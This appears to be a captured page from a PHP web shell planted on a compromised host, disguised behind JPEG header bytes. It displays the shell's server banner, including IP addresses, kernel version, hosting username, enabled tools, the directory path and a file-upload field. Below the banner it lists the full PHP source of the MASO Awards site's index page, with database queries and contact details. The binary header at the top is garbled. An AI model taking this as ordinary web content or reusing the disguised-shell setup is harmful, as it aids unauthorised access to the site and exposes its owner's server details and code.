����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 18.116.80.68 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/maso-awards.live/ |
Upload File : |
<?php include './php/connect.php'; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <title>MASO AWARDS</title> <meta content="Youth Empowerment Through Arts" name="description"> <meta content="" name="keywords"> <!-- Icons --> <link href="./assets/img/logo.png" rel="icon"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,700,700i|Raleway:300,400,500,700,800" rel="stylesheet"> <!-- Vendor CSS Files --> <link href="assets/vendor/aos/aos.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet"> <link href="assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet"> <link href="assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet"> <link rel="icon" type="image/png" href="./assets/img/maso.png"> <!-- Template Main CSS File --> <link href="assets/css/style.css" rel="stylesheet"> <!-- Sweet Alert --> <script src="./js/sweetalert.min.js"></script> <!--og codes--> <meta property="og:url" content="https://maso-awards.com/index.php" /> <meta property="og:type" content="website" /> <meta property="og:title" content="<?php echo "MASO AWARDS"; ?>" /> <meta property="og:image" content="https://maso-awards.live/assets/img/maso-og.jpg" /> <meta property="og:description" content="Be part of the biggest music and arts awards show in Malawi" /> <meta property="fb:app_id" content="197362031139140" /> </head> <body> <?php include './header.php'; ?> <!-- ======= Hero Section ======= --> <section id="hero"> <video src="./images/performance.mp4" autoplay muted loop></video> <div class="overlay"></div> <div class="hero-container" data-aos="zoom-in" data-aos-delay="100"> <h1 class="mb-4 pb-0">WELCOME TO<br><span>MASO AWARDS</span> <?php echo date('Y'); ?></h1> <p class="mb-4 pb-0">Be part of the biggest music and arts awards show in Malawi. Experience the glitz and glamour at the Maso Awards <?php echo date('Y'); ?></p> <!-- <a href="waiting-list" class="about-btn scrollto">Join The Wait List Now!</a> --> </div> </section><!-- End Hero Section --> <main id="main"> <!-- ======= About Section ======= --> <section id="about"> <div class="container" data-aos="fade-up"> <div class="row"> <div class="col-lg-6"> <h2>About The Event</h2> <p>The Maso Awards, established in 2019 by Maso Enterprises, aim to celebrate and promote local music talent in Malawi. As a hybrid awards platform, we provide equal opportunities for artists across various genres to showcase their talent and earn recognition. Our vision is to become the premier music awards event in Malawi, fostering growth and excellence in the local music industry.</p> </div> <div class="col-lg-3"> <h3>Where</h3> <!-- <p>COMESA Hall</p> --> </div> <div class="col-lg-3"> <h3>When</h3> <!-- <p>28 December 2024</p> --> </div> </div> </div> </section><!-- End About Section --> <!-- ======= Articles Section ======= --> <section id="hotels" class="section-with-bg"> <div class="container" data-aos="fade-up"> <div class="section-header"> <h2>News</h2> </div> <div class="row" data-aos="fade-up" data-aos-delay="100"> <?php $query = "SELECT * FROM `articles` ORDER BY `aid` DESC"; $run = mysqli_query($conn, $query) or die(mysqli_error($conn)); while ($row = mysqli_fetch_array($run)) { ?> <div class="col-lg-4 col-md-6"> <div class="hotel"> <div class="hotel-img"> <img src="./assets/articles/<?php echo $row['image']; ?>" alt=""> </div> <h3><a href="article-<?php echo $row['aid'] ?>"><?php echo strtoupper($row['title']); ?></a></h3> </div> </div> <?php } ?> </div> </div> </section><!-- End Hotels Section --> <!-- ======= Schedule Section ======= --> <section id="schedule" class="section-with-bg"> <div class="container" data-aos="fade-up"> <div class="section-header"> <h2>Event Calendar</h2> <p>Here is our event calendar</p> </div> <div class="tab-content row justify-content-center" data-aos="fade-up" data-aos-delay="200"> <!-- Schedule Day 1 --> <div role="tabpanel" class="col-lg-9 tab-pane fade show active" id="day-1"> <div class="row schedule-item"> <div class="col-md-2"><time>Phase 1</time></div> <div class="col-md-10"> <div class="speaker"> <img src="assets/img/nominee.png" alt="Nominations"> </div> <h4>Nominations</h4> <p>-</p> </div> </div> <div class="row schedule-item"> <div class="col-md-2"><time>Phase 2</time></div> <div class="col-md-10"> <div class="speaker"> <img src="assets/img/vote.png" alt="Voting"> </div> <h4>Voting</h4> <p>-</p> </div> </div> <div class="row schedule-item d-flex"> <div class="col-md-2"><time>Phase 3</time></div> <div class="col-md-10"> <div class="speaker"> <img src="assets/img/red-carpet.png" alt="Award Event"> </div> <h4>Award Event</h4> <p>-</p> </div> </div> </div> </div> </div> </section><!-- End Schedule Section --> <!-- ======= Gallery Section ======= --> <section id="gallery"> <div class="container" data-aos="fade-up"> <div class="section-header"> <h2>Gallery</h2> </div> </div> <div class="gallery-slider swiper"> <div class="swiper-wrapper align-items-center"> <?php $query = "SELECT * FROM `gallery` ORDER BY `gid` DESC"; $run = mysqli_query($conn, $query) or die(mysqli_error($conn)); while ($row = mysqli_fetch_array($run)) { ?> <div class="swiper-slide"><a href="assets/img/gallery/<?php echo $row['image']; ?>" class="gallery-lightbox"><img src="assets/img/gallery/<?php echo $row['image']; ?>" class="img-fluid" alt=""></a></div> <?php } ?> </div> <div class="swiper-pagination"></div> </div> </section><!-- End Gallery Section --> <!-- ======= Venue Section ======= --> <!-- <section id="venue"> <div class="container-fluid" data-aos="fade-up"> <div class="section-header"> <h2>Event Venue</h2> <p>Event venue location info and gallery</p> </div> <div class="row g-0"> <div class="col-lg-6 venue-map"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d923.5258134915497!2d35.02996856956615!3d-15.800364708619462!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x18d8458c337e69a7%3A0xb45a7268bbdc9f6c!2sCOMESA%20Hall!5e1!3m2!1sen!2smw!4v1727084038918!5m2!1sen!2smw" width="600" height="450" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </div> <div class="col-lg-6 venue-info"> <div class="row justify-content-center"> <div class="col-11 col-lg-8 position-relative"> --> <!-- <h3>COMESA Hall</h3> --> <!-- <p>Majestically poised in the central business district, 25 kilometres from Kamuzu International Airport</p> --> <!-- </div> </div> </div> </div> </div> </section> --> <!-- End Venue Section --> <!-- ======= Supporters Section ======= --> <section id="supporters" class="section-with-bg"> <div class="container" data-aos="fade-up"> <div class="section-header"> <h2>Partners</h2> </div> <div class="row no-gutters supporters-wrap clearfix" data-aos="zoom-in" data-aos-delay="100"> <?php $sql = "SELECT * FROM `partners` ORDER BY `pid` DESC"; $query_run = mysqli_query($conn, $sql) or die(mysqli_error($conn)); while ($row = mysqli_fetch_array($query_run)) { ?> <div class="col-lg-3 col-md-4 col-xs-6"> <div class="supporter-logo"> <img src="assets/img/partners/<?php echo $row['image']; ?>" class="img-fluid p-1" alt=""> </div> </div> <?php } ?> </div> </div> </section><!-- End Sponsors Section --> <!-- ======= Contact Section ======= --> <section id="contact" class="section-bg"> <div class="container" data-aos="fade-up"> <div class="section-header"> <h2>Contact Us</h2> </div> <div class="row contact-info"> <div class="col-md-4"> <div class="contact-address"> <i class="bi bi-geo-alt"></i> <h3>Address</h3> <address>Chichiri, Blantyre, Malawi</address> </div> </div> <div class="col-md-4"> <div class="contact-phone"> <i class="bi bi-phone"></i> <h3>Phone Number</h3> <p><a href="tel:+265884085995">+265 884 085 995</a></p> </div> </div> <div class="col-md-4"> <div class="contact-email"> <i class="bi bi-envelope"></i> <h3>Email</h3> <p><a href="mailto:info@maso-awards.live">info@maso-awards.live</a></p> </div> </div> </div> </div> </section><!-- End Contact Section --> </main><!-- End #main --> <!-- ======= Footer ======= --> <footer id="footer"> <div class="footer-top"> <div class="container"> <div class="row"> <div class="col-lg-4 col-md-6 footer-links"> <h4>Useful Links</h4> <ul> <li><i class="bi bi-chevron-right"></i> <a href="#about">About Us</a></li> <li><i class="bi bi-chevron-right"></i> <a href="#hotels">News</a></li> <li><i class="bi bi-chevron-right"></i> <a href="nominate">Nominate</a></li> <li><i class="bi bi-chevron-right"></i> <a href="#vote">Vote</a></li> </ul> </div> <div class="col-lg-4 col-md-6 footer-info"> <img src="assets/img/maso-icon.png" alt="TheEvenet"> </div> <div class="col-lg-4 col-md-6 footer-contact"> <h4>Contact Us</h4> <p> Chichiri<br> Blantyre<br> Malawi <br> <strong>Phone:</strong> +265 884 41 21 72 / +265 994 61 91 94<br> <strong>Email:</strong> info@maso-awards.live<br> </p> <div class="social-links"> <a href="#" class="twitter"><i class="bi bi-twitter"></i></a> <a href="#" class="facebook"><i class="bi bi-facebook"></i></a> <a href="#" class="instagram"><i class="bi bi-instagram"></i></a> <a href="#" class="google-plus"><i class="bi bi-instagram"></i></a> <a href="#" class="linkedin"><i class="bi bi-linkedin"></i></a> </div> </div> </div> </div> </div> <div class="container"> <div class="copyright"> © Copyright <strong>MASO Awards</strong>. All Rights Reserved </div> </div> </footer><!-- End Footer --> <a href="#" class="back-to-top d-flex align-items-center justify-content-center"><i class="bi bi-arrow-up-short"></i></a> <!-- Vendor JS Files --> <script src="assets/vendor/aos/aos.js"></script> <script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"></script> <script src="assets/vendor/glightbox/js/glightbox.min.js"></script> <script src="assets/vendor/swiper/swiper-bundle.min.js"></script> <!-- Template Main JS File --> <script src="assets/js/main.js"></script> <script> //slicing all playlists titles var count = document.querySelectorAll(".hotel a").length; for (var i = 0; i < count; i++) { var title = document.querySelectorAll(".hotel a")[i].innerText; var slicer = title.slice(0, 30); if (title.length >= 30) { document.querySelectorAll(".hotel a")[i].innerHTML = slicer + '...'; } else { document.querySelectorAll(".hotel a")[i].innerHTML = slicer; } } </script> <?php if (isset($_GET['email'], $_GET['name'], $_GET['mobile'])) { $email = mysqli_real_escape_string($conn, htmlentities($_GET['email'])); $name = mysqli_real_escape_string($conn, htmlentities($_GET['name'])); $mobile = mysqli_real_escape_string($conn, htmlentities($_GET['mobile'])); $count = mysqli_num_rows(mysqli_query($conn, "SELECT * FROM `waiting_list` WHERE `email`='$email'")); if (!($count > 0)) { if (mysqli_query($conn, "INSERT INTO `waiting_list`(`name`,`mobile`,`email`) VALUES('$name','$mobile','$email')") or die($conn)) { ?> <script> swal("", "You have been verified successfully", "success"); window.setTimeout(function() { window.location = "./home"; }, 3000); </script> <?php } } else { ?> <script> swal("", "You already joined the wait list", "error"); window.setTimeout(function() { window.location = "./home"; }, 3000); </script> <?php } } ?> </body> </html>